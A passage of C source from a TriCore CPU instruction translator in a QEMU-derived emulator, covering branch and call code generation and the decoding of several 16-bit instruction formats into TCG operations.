0); tcg_temp_free(tcg_ctx, temp); } /* helpers for generating program flow micro-ops */ static inline void gen_save_pc(DisasContext *ctx, target_ulong pc) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PC, pc); } static inline bool use_goto_tb(DisasContext *ctx, target_ulong dest) { if (unlikely(ctx->base.singlestep_enabled)) { return false; } return (ctx->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; // if (translator_use_goto_tb(&ctx->base, dest)) { if (use_goto_tb(ctx, dest)) { tcg_gen_goto_tb(tcg_ctx, n); gen_save_pc(ctx, dest); tcg_gen_exit_tb(tcg_ctx, ctx->base.tb, n); } else { gen_save_pc(ctx, dest); tcg_gen_lookup_and_goto_ptr(tcg_ctx); } } static void generate_trap(DisasContext *ctx, int class, int tin) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 classtemp = tcg_const_i32(tcg_ctx, class); TCGv_i32 tintemp = tcg_const_i32(tcg_ctx, tin); gen_save_pc(ctx, ctx->base.pc_next); gen_helper_raise_exception_sync(tcg_ctx, tcg_ctx->cpu_env, classtemp, tintemp); ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, classtemp); tcg_temp_free(tcg_ctx, tintemp); } static inline void gen_branch_cond(DisasContext *ctx, TCGCond cond, TCGv r1, TCGv r2, int16_t address) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *jumpLabel = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, cond, r1, r2, jumpLabel); gen_goto_tb(ctx, 1, ctx->pc_succ_insn); gen_set_label(tcg_ctx, jumpLabel); gen_goto_tb(ctx, 0, ctx->base.pc_next + address * 2); } static inline void gen_branch_condi(DisasContext *ctx, TCGCond cond, TCGv r1, int r2, int16_t address) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, r2); gen_branch_cond(ctx, cond, r1, temp, address); tcg_temp_free(tcg_ctx, temp); } static void gen_loop(DisasContext *ctx, int r1, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_subi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r1], 1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_a[r1], -1, l1); gen_goto_tb(ctx, 1, ctx->base.pc_next + offset); gen_set_label(tcg_ctx, l1); gen_goto_tb(ctx, 0, ctx->pc_succ_insn); } static void gen_fcall_save_ctx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[10], -4); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], temp, ctx->mem_idx, MO_LESL); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], ctx->pc_succ_insn); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[10], temp); tcg_temp_free(tcg_ctx, temp); } static void gen_fret(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[11], ~0x1); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], tcg_ctx->cpu_gpr_a[10], ctx->mem_idx, MO_LESL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[10], tcg_ctx->cpu_gpr_a[10], 4); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PC, temp); tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, temp); } static void gen_compute_branch(DisasContext *ctx, uint32_t opc, int r1, int r2 , int32_t constant , int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp, temp2; int n; switch (opc) { /* SB-format jumps */ case OPC1_16_SB_J: case OPC1_32_B_J: gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); break; case OPC1_32_B_CALL: case OPC1_16_SB_CALL: gen_helper_1arg(tcg_ctx, call, ctx->pc_succ_insn); gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); break; case OPC1_16_SB_JZ: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], 0, offset); break; case OPC1_16_SB_JNZ: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[15], 0, offset); break; /* SBC-format jumps */ case OPC1_16_SBC_JEQ: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], constant, offset); break; case OPC1_16_SBC_JEQ2: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], constant, offset + 16); break; case OPC1_16_SBC_JNE: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[15], constant, offset); break; case OPC1_16_SBC_JNE2: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[15], constant, offset + 16); break; /* SBRN-format jumps */ case OPC1_16_SBRN_JZ_T: temp = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[15], 0x1u << constant); gen_branch_condi(ctx, TCG_COND_EQ, temp, 0, offset); tcg_temp_free(tcg_ctx, temp); break; case OPC1_16_SBRN_JNZ_T: temp = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[15], 0x1u << constant); gen_branch_condi(ctx, TCG_COND_NE, temp, 0, offset); tcg_temp_free(tcg_ctx, temp); break; /* SBR-format jumps */ case OPC1_16_SBR_JEQ: gen_branch_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], offset); break; case OPC1_16_SBR_JEQ2: gen_branch_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], offset + 16); break; case OPC1_16_SBR_JNE: gen_branch_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], offset); break; case OPC1_16_SBR_JNE2: gen_branch_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], offset + 16); break; case OPC1_16_SBR_JNZ: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JNZ_A: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_a[r1], 0, offset); break; case OPC1_16_SBR_JGEZ: gen_branch_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JGTZ: gen_branch_condi(ctx, TCG_COND_GT, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JLEZ: gen_branch_condi(ctx, TCG_COND_LE, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JLTZ: gen_branch_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JZ: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JZ_A: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_a[r1], 0, offset); break; case OPC1_16_SBR_LOOP: gen_loop(ctx, r1, offset * 2 - 32); break; /* SR-format jumps */ case OPC1_16_SR_JI: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], 0xfffffffe); tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; case OPC2_32_SYS_RET: case OPC2_16_SR_RET: gen_helper_ret(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; /* B-format */ case OPC1_32_B_CALLA: gen_helper_1arg(tcg_ctx, call, ctx->pc_succ_insn); gen_goto_tb(ctx, 0, EA_B_ABSOLUT(offset)); break; case OPC1_32_B_FCALL: gen_fcall_save_ctx(ctx); gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); break; case OPC1_32_B_FCALLA: gen_fcall_save_ctx(ctx); gen_goto_tb(ctx, 0, EA_B_ABSOLUT(offset)); break; case OPC1_32_B_JLA: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], ctx->pc_succ_insn); /* fall through */ case OPC1_32_B_JA: gen_goto_tb(ctx, 0, EA_B_ABSOLUT(offset)); break; case OPC1_32_B_JL: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], ctx->pc_succ_insn); gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); break; /* BOL format */ case OPCM_32_BRC_EQ_NEQ: if (MASK_OP_BRC_OP2(ctx->opcode) == OPC2_32_BRC_JEQ) { gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], constant, offset); } else { gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], constant, offset); } break; case OPCM_32_BRC_GE: if (MASK_OP_BRC_OP2(ctx->opcode) == OP2_32_BRC_JGE) { gen_branch_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r1], constant, offset); } else { constant = MASK_OP_BRC_CONST4(ctx->opcode); gen_branch_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r1], constant, offset); } break; case OPCM_32_BRC_JLT: if (MASK_OP_BRC_OP2(ctx->opcode) == OPC2_32_BRC_JLT) { gen_branch_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r1], constant, offset); } else { constant = MASK_OP_BRC_CONST4(ctx->opcode); gen_branch_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r1], constant, offset); } break; case OPCM_32_BRC_JNE: temp = tcg_temp_new(tcg_ctx); if (MASK_OP_BRC_OP2(ctx->opcode) == OPC2_32_BRC_JNED) { tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); /* subi is unconditional */ tcg_gen_subi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 1); gen_branch_condi(ctx, TCG_COND_NE, temp, constant, offset); } else { tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); /* addi is unconditional */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 1); gen_branch_condi(ctx, TCG_COND_NE, temp, constant, offset); } tcg_temp_free(tcg_ctx, temp); break; /* BRN format */ case OPCM_32_BRN_JTT: n = MASK_OP_BRN_N(ctx->opcode); temp = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], (1 << n)); if (MASK_OP_BRN_OP2(ctx->opcode) == OPC2_32_BRN_JNZ_T) { gen_branch_condi(ctx, TCG_COND_NE, temp, 0, offset); } else { gen_branch_condi(ctx, TCG_COND_EQ, temp, 0, offset); } tcg_temp_free(tcg_ctx, temp); break; /* BRR Format */ case OPCM_32_BRR_EQ_NEQ: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JEQ) { gen_branch_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } else { gen_branch_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } break; case OPCM_32_BRR_ADDR_EQ_NEQ: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JEQ_A) { gen_branch_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], offset); } else { gen_branch_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], offset); } break; case OPCM_32_BRR_GE: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JGE) { gen_branch_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } else { gen_branch_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } break; case OPCM_32_BRR_JLT: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JLT) { gen_branch_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } else { gen_branch_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } break; case OPCM_32_BRR_LOOP: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_LOOP) { gen_loop(ctx, r2, offset * 2); } else { /* OPC2_32_BRR_LOOPU */ gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); } break; case OPCM_32_BRR_JNE: temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); if (MASK_OP_BRC_OP2(ctx->opcode) == OPC2_32_BRR_JNED) { tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); /* also save r2, in case of r1 == r2, so r2 is not decremented */ tcg_gen_mov_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); /* subi is unconditional */ tcg_gen_subi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 1); gen_branch_cond(ctx, TCG_COND_NE, temp, temp2, offset); } else { tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); /* also save r2, in case of r1 == r2, so r2 is not decremented */ tcg_gen_mov_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); /* addi is unconditional */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 1); gen_branch_cond(ctx, TCG_COND_NE, temp, temp2, offset); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPCM_32_BRR_JNZ: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JNZ_A) { gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_a[r1], 0, offset); } else { gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_a[r1], 0, offset); } break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } ctx->base.is_jmp = DISAS_NORETURN; } /* * Functions for decoding instructions */ static void decode_src_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1; int32_t const4; TCGv temp, temp2; r1 = MASK_OP_SRC_S1D(ctx->opcode); const4 = MASK_OP_SRC_CONST4_SEXT(ctx->opcode); switch (op1) { case OPC1_16_SRC_ADD: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_ADD_A15: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], const4); break; case OPC1_16_SRC_ADD_15A: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_ADD_A: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r1], const4); break; case OPC1_16_SRC_CADD: gen_condi_add(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], const4, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15]); break; case OPC1_16_SRC_CADDN: gen_condi_add(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], const4, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15]); break; case OPC1_16_SRC_CMOV: temp = tcg_const_tl(tcg_ctx, 0); temp2 = tcg_const_tl(tcg_ctx, const4); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], temp, temp2, tcg_ctx->cpu_gpr_d[r1]); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPC1_16_SRC_CMOVN: temp = tcg_const_tl(tcg_ctx, 0); temp2 = tcg_const_tl(tcg_ctx, const4); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], temp, temp2, tcg_ctx->cpu_gpr_d[r1]); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPC1_16_SRC_EQ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_LT: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_MOV: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_MOV_A: const4 = MASK_OP_SRC_CONST4(ctx->opcode); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], const4); break; case OPC1_16_SRC_MOV_E: if (has_feature(ctx, TRICORE_FEATURE_16)) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], const4); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], 31); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_16_SRC_SH: gen_shi(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_SHA: gen_shaci(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], const4); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_srr_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1, r2; TCGv temp; r1 = MASK_OP_SRR_S1D(ctx->opcode); r2 = MASK_OP_SRR_S2(ctx->opcode); switch (op1) { case OPC1_16_SRR_ADD: gen_add_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_ADD_A15: gen_add_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_ADD_15A: gen_add_d(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_ADD_A: tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC1_16_SRR_ADDS: gen_adds(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_AND: tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_CMOV: temp = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], temp, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1]); tcg_temp_free(tcg_ctx, temp); break; case OPC1_16_SRR_CMOVN: temp = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], temp, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1]); tcg_temp_free(tcg_ctx, temp); break; case OPC1_16_SRR_EQ: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_LT: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_MOV: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_MOV_A: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_MOV_AA: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC1_16_SRR_MOV_D: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC1_16_SRR_MUL: gen_mul_i32s(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_OR: tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_SUB: gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_SUB_A15B: gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_SUB_15AB: gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_SUBS: gen_subs(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_XOR: tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_ssr_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1, r2; r1 = MASK_OP_SSR_S1(ctx->opcode); r2 = MASK_OP_SSR_S2(ctx->opcode); switch (op1) { case OPC1_16_SSR_ST_A: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); break; case OPC1_16_SSR_ST_A_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 4); break; case OPC1_16_SSR_ST_B: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); break; case OPC1_16_SSR_ST_B_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 1); break; case OPC1_16_SSR_ST_H: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); break; case OPC1_16_SSR_ST_H_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 2); break; case OPC1_16_SSR_ST_W: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); break; case OPC1_16_SSR_ST_W_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 4); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_sc_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t const16; const16 = MASK_OP_SC_CONST8(ctx->opcode); switch (op1) { case OPC1_16_SC_AND: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[15], const16); break; case OPC1_16_SC_BISR: gen_helper_1arg(tcg_ctx, bisr, const16 & 0xff); break; case OPC1_16_SC_LD_A: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_a[15], tcg_ctx->cpu_gpr_a[10], const16 * 4, MO_LESL); break; case OPC1_16_SC_LD_W: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[10], const16 * 4, MO_LESL); break; case OPC1_16_SC_MOV: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[15], const16); break; case OPC1_16_SC_OR: tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[15], const16); break; case OPC1_16_SC_ST_A: gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[15], tcg_ctx->cpu_gpr_a[10], const16 * 4, MO_LESL); break; case OPC1_16_SC_ST_W: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[10], const16 * 4, MO_LESL); break; case OPC1_16_SC_SUB_A: tcg_gen_subi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[10], tcg_ctx->cpu_gpr_a[10], const16); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_slr_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1, r2; r1 = MASK_OP_SLR_D(ctx->opcode); r2 = MASK_OP_SLR_S2(ctx->opcode); switch (op1) { /* SLR-format */ case OPC1_16_SLR_LD_A: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); break; case OPC1_16_SLR_LD_A_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 4); break; case OPC1_16_SLR_LD_BU: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); break; case OPC1_16_SLR_LD_BU_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 1); break; case OPC1_16_SLR_LD_H: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESW); break; case OPC1_16_SLR_LD_H_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], 